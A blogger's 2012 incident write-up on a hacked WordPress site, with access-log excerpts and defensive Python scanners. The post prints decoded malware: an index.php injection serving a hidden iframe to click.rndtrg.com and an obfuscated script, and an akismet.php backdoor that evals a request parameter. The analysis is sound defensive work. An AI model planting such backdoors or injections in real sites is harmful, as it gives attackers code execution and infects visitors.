Nov 11 2012

WordPress hacked through akismet plugin and twentyeleven-twentyten theme

Yesterday I noticed that one of my websites, www.firemalinois.ro, was reported by Chrome as being an attack site. Google said that in the last 90 days it had checked the site 4 times and found it infected. So my first piece of information was that the infection happened after 9 August (3 months ago).
The site was set up on 23 August 2012, when I changed my hosting solution.

Some data about my website: WordPress 3.1.1
Themes: Sliding door (in use), twentyten, twentyeleven
Plugins:

  • akismet 2.5.6
  • cool-video-gallery 1.6
  • googleanalytics 1.0.2
  • nextgen-gallery 1.9.5
  • nextgen-gallery-sidebar-widget 0.4.3

I searched my site and found these altered files:
/firemalinois.ro/web/index.php
and
/firemalinois.ro/web/wp-content/plugins/akismet/akismet.php

Also, in each theme's folder there were 4 modified files: functions.php, index.php, footer.php and header.php.

Also, the WordPress folder had a few files containing lists of IPs, like this one:

bafa2cd7711c5af093aab1c4f358acb5
193.106.136.40|193.106.136.40|5.12.82.71|178.137.129.8|95.168.172.156|95.168.172.156|79.113.76.160|

The akismet.php file was modified on 24 Aug 2012 at 20:43. All the other files had a different date (the date when I uploaded the site by FTP).

The index.php file had the following code in it, starting with:

(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGlwPSRfU0VSVkV..............'));

Decoding it we get:

error_reporting(0);
$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];$ua = $_SERVER['HTTP_USER_AGENT'];
$odbf = $dr.'/'.md5(date('m.d.y'),time()-86400);
if (file_exists($odbf))@unlink($odbf);
$dbf=$dr.'/'.md5(date('m.d.y'));
if((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Opera')!==false)||(strpos($ua,'Firefox')!==false||(strpos($ua,'Mozilla')!==false))&&(strpos(@file_get_contents($dbf),$ip) === false))){
    error_reporting(0);
    echo(base64_decode('PHNjcmlwdD50cnl7aWYod2lu....'));
    if ($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);}
} else echo '<iframe style="visibility:hidden;position:absolute;left:0;top:0;" width="100" height="6" src="http://click.rndtrg.com/feed/frames.php?uid=99&frames=2"></iframe>';

The decoded code first tries to delete what is meant to be the previous day's IP list, then checks whether the visitor's User-Agent names a Windows browser and whether the visitor's IP is not yet recorded in a file in the document root named after the MD5 of the current date (the IP list files mentioned above). A new Windows visitor receives the base64-encoded script below and its IP is appended to that file; any other request gets a hidden iframe pointing to click.rndtrg.com. Decoding the script further leads to:

<script>try{if(window.document)window["document"]["body"]="123"}catch(bawetawe)
...
...
...
{k=i;if(window["document"])s+=String["fro"+"mC"+"harCode"](parseInt(n[i],25));}z=s;ev(z)}}}</script>

Relevant log lines at 20:43:

firemalinois.ro:80 91.224.160.141 - - [24/Aug/2012:20:34:00 +0300] "GET /wp-contentp?asc=echo%20'xx23423'.'2xxcv3'.'dcfxcx2xdf';die(); HTTP/1.1" 404 11433 "-" "Mozilla/5.0 (Windows;U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 61.55.141.10 - - [24/Aug/2012:20:34:01 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=twentyeleven HTTP/1.0" 200 13456 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 61.55.141.10 - - [24/Aug/2012:20:34:03 +0300] "POST /wp-admin/theme-editor.php HTTP/1.0" 302 547 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:31 +0300] "GET /wp-admin/theme-editor.php HTTP/1.1" 200 12168 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:34 +0300] "GET /wp-admin/theme-editor.php?file=footer.php&theme=sliding-door HTTP/1.1" 200 7099 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:36 +0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 581 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:38 +0300] "GET /wp-admin/theme-editor.php?file=footer.php&theme=sliding-door&scrollto=0&updated=true HTTP/1.1" 200 7308 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 91.224.160.141 - - [24/Aug/2012:20:34:39 +0300] "GET /wp-contentp?asc=echo%20'xx23423'.'2xxcv3'.'dcfxcx2xdf';die(); HTTP/1.1" 404 10115 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:41 +0300] "GET /wp-admin/theme-editor.php?file=footer.php&theme=sliding-door HTTP/1.1" 200 7266 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:44 +0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 581 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:46 +0300] "GET /wp-admin/theme-editor.php?file=footer.php&theme=sliding-door&scrollto=0&updated=true HTTP/1.1" 200 7158 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:48 +0300] "GET /wp-admin/theme-editor.php?file=header.php&theme=sliding-door HTTP/1.1" 200 8461 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:50 +0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 581 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:53 +0300] "GET /wp-admin/theme-editor.php?file=header.php&theme=sliding-door&scrollto=0&updated=true HTTP/1.1" 200 8660 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 91.224.160.141 - - [24/Aug/2012:20:34:53 +0300] "GET /wp-contentp?asc=echo%20'xx23423'.'2xxcv3'.'dcfxcx2xdf';die(); HTTP/1.1" 404 484 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:55 +0300] "GET /wp-admin/theme-editor.php?file=header.php&theme=sliding-door HTTP/1.1" 200 8620 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:57 +0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 581 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:34:59 +0300] "GET /wp-admin/theme-editor.php?file=header.php&theme=sliding-door&scrollto=0&updated=true HTTP/1.1" 200 8515 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

Looking in my Apache logs around that date, I found the following lines:

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:35:21 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=twentyten HTTP/1.1" 200 12424 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:35:25 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=twentyten&scrollto=0&updated=true HTTP/1.1" 200 12322 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:35:58 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=sliding-door1 HTTP/1.1" 200 12095 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U;Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:36:02 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=sliding-door1&scrollto=0&updated=true HTTP/1.1" 200 12281 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:36:38 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=sliding-door2 HTTP/1.1" 200 13816 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U;Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:36:42 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=sliding-door2&scrollto=0&updated=true HTTP/1.1" 200 13996 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:37:23 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=twentyeleven HTTP/1.1" 200 13344 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"

firemalinois.ro:80 218.2.129.53 - - [24/Aug/2012:20:37:28 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=twentyeleven&scrollto=0&updated=true HTTP/1.1" 200 13537 "http://www.firemalinois.ro/wp-admin/theme-editor.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.2) Gecko/20100115 MRA 5.6 (build 03278) Firefox/3.6 (.NET CLR 3.5.30729)"
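The log excerpt above shows the whole pattern in a few lines: a probe of the `asc` parameter (the one the injected akismet.php evaluates), a GET of a theme file in the built-in theme editor, a POST that saves it, and a redirect back with `updated=true`. The following is an added detection script, not part of the original post, that parses Apache lines in this vhost_combined format and flags exactly those three events. The log lines it runs on are constructed samples using documentation IP ranges and a placeholder vhost; the field layout and paths match the excerpt above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache vhost_combined layout, as in the excerpt above:
#   vhost:port client - - [time] "METHOD target proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

THEME_EDITOR = "/wp-admin/theme-editor.php"
BACKDOOR_PARAM = "asc"  # parameter evaluated by the code injected into akismet.php

# Constructed sample log (placeholder vhost and RFC 5737 documentation IPs).
SAMPLE_LOG = """\
example.test:80 192.0.2.10 - - [24/Aug/2012:20:30:00 +0300] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
example.test:80 198.51.100.7 - - [24/Aug/2012:20:34:00 +0300] "GET /wp-contentp?asc=echo%20'probe';die(); HTTP/1.1" 404 11433 "-" "Mozilla/5.0"
example.test:80 203.0.113.5 - - [24/Aug/2012:20:34:01 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=twentyeleven HTTP/1.0" 200 13456 "http://example.test/wp-admin/theme-editor.php" "Mozilla/5.0"
example.test:80 203.0.113.5 - - [24/Aug/2012:20:34:03 +0300] "POST /wp-admin/theme-editor.php HTTP/1.0" 302 547 "http://example.test/wp-admin/theme-editor.php" "Mozilla/5.0"
example.test:80 203.0.113.5 - - [24/Aug/2012:20:34:05 +0300] "GET /wp-admin/theme-editor.php?file=functions.php&theme=twentyeleven&scrollto=0&updated=true HTTP/1.1" 200 13537 "http://example.test/wp-admin/theme-editor.php" "Mozilla/5.0"
""".splitlines()


def parse_line(line):
    """Split one access-log line into fields; return None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def detect(lines):
    """Return a list of alert dicts for backdoor probes and theme-editor file writes."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        q = rec["query"]
        if BACKDOOR_PARAM in q:
            # Any request carrying the backdoor parameter, whatever the status code:
            # the 404 above still shows someone testing for the injected eval.
            alerts.append({"kind": "backdoor_param", "ip": rec["ip"], "time": rec["time"],
                           "payload": q[BACKDOOR_PARAM][0]})
        elif rec["path"] == THEME_EDITOR and rec["method"] == "POST":
            # A POST to theme-editor.php is a file write through the admin editor.
            alerts.append({"kind": "theme_editor_write", "ip": rec["ip"], "time": rec["time"]})
        elif rec["path"] == THEME_EDITOR and q.get("updated") == ["true"]:
            # The redirect target after a successful save names the file and theme touched.
            alerts.append({"kind": "theme_editor_saved", "ip": rec["ip"], "time": rec["time"],
                           "file": q.get("file", ["?"])[0], "theme": q.get("theme", ["?"])[0]})
    return alerts


def by_ip(alerts):
    """Count alerts per client IP so the editing session stands out from normal traffic."""
    counts = {}
    for a in alerts:
        counts[a["ip"]] = counts.get(a["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for a in found:
        print(a)
    print(by_ip(found))
```

Run it over the real access log with `detect(open(path))`; a `theme_editor_saved` alert for a theme that is not active (twentyten, twentyeleven) is the clearest sign of what happened here, since nobody legitimately edits an inactive theme's functions.php from an unfamiliar IP.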

The akismet.php file had the following code at the beginning:

eval (base64_decode ("aWYgKGlzc2V0KCRfUkVRVUVTVFsnYXNjJ10pKSB7IGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFsnYXNjJ10pKTsgZXhpdDsgfS8qIEU3M0pWREg5biAqLw=="));

Decoding it we get:

if (isset($_REQUEST['asc'])) { eval(stripslashes($_REQUEST['asc'])); exit; }/* E73JVDH9n */
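Both the index.php injection and the akismet.php backdoor hide behind `eval(base64_decode('...'))`, so the quickest way to find every altered file is to search the tree for that construct and decode the literal. The following scanner is an added example, not code from the original post: it locates such calls (tolerating the spacing in the akismet.php line), decodes them, and reports which suspicious fragments the decoded text contains. The sample input is constructed from the akismet.php line quoted above plus a clean file; the temp-directory layout is an assumption made for the demo.

```python
import base64
import re
import tempfile
from pathlib import Path

# eval(base64_decode('...')) with a long base64 literal; \s* tolerates the
# "eval (base64_decode (\"...\"))" spacing seen in the altered akismet.php.
EVAL_B64_RE = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=]{20,})['"]\s*\)\s*\)"""
)

# Fragments that, in decoded text, point to a remote-eval backdoor or injected HTML.
SUSPICIOUS = ("eval(", "$_REQUEST", "$_GET", "$_POST", "<iframe", "<script")

# Constructed sample: the injected first line quoted above, followed by a normal
# plugin header so the file looks like a real akismet.php.
AKISMET_SAMPLE = (
    "<?php\n"
    'eval (base64_decode ("aWYgKGlzc2V0KCRfUkVRVUVTVFsnYXNjJ10pKSB7IGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFsnYXNjJ10pKTsgZXhpdDsgfS8qIEU3M0pWREg5biAqLw=="));\n'
    "/*\nPlugin Name: Akismet\n*/\n"
)
CLEAN_SAMPLE = "<?php\n/*\nPlugin Name: Akismet\n*/\nfunction akismet_init() {}\n"


def find_encoded_evals(source):
    """Return [(offset, decoded_text)] for every eval(base64_decode('...')) in PHP source."""
    hits = []
    for m in EVAL_B64_RE.finditer(source):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64: leave it for manual review
            continue
        hits.append((m.start(), decoded))
    return hits


def classify(decoded):
    """List the suspicious fragments present in a decoded payload (empty = review by hand)."""
    return [s for s in SUSPICIOUS if s in decoded]


def scan_tree(root):
    """Map each .php file (relative path) that has hits to [(offset, decoded, indicators)]."""
    root = Path(root)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        hits = find_encoded_evals(path.read_text(errors="replace"))
        if hits:
            findings[path.relative_to(root).as_posix()] = [
                (off, dec, classify(dec)) for off, dec in hits
            ]
    return findings


def demo():
    """Write the two constructed files into a temporary WordPress-like tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        plugin = Path(tmp, "wp-content", "plugins", "akismet")
        plugin.mkdir(parents=True)
        (plugin / "akismet.php").write_text(AKISMET_SAMPLE)
        (plugin / "legacy.php").write_text(CLEAN_SAMPLE)
        return scan_tree(tmp)


if __name__ == "__main__":
    for rel, hits in demo().items():
        for off, dec, flags in hits:
            print(f"{rel} @{off}: {flags}\n    {dec}")
```

Point `scan_tree` at the web root to get the same list the author assembled by hand; anything it decodes to `eval($_REQUEST[...])`, an `<iframe>` or a `<script>` is a file to restore from a clean copy rather than patch in place.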

I had two child themes of Sliding door, named slidingdoor1 and slidingdoor2. It seems that somehow they had the list of my themes and used one of them to infiltrate the site. On another forum I read that someone had the same problem, and they had the twentyten and twentyeleven (not active) themes.

Measures taken: uninstall akismet and the twentyten and twentyeleven themes, update WordPress to the latest version, clean the bad code, change the FTP, SQL and WordPress passwords.

I found a similar thread here: http://www.webarttech.net/blog/2012/07/wordpress-infekcja-plikow-index-php-i-index-html-poprzez-dodanie-iframe. Use Google Translate to read it.
Another forum thread describing the same method: http://forums.digitalpoint.com/showthread.php?t=2383410
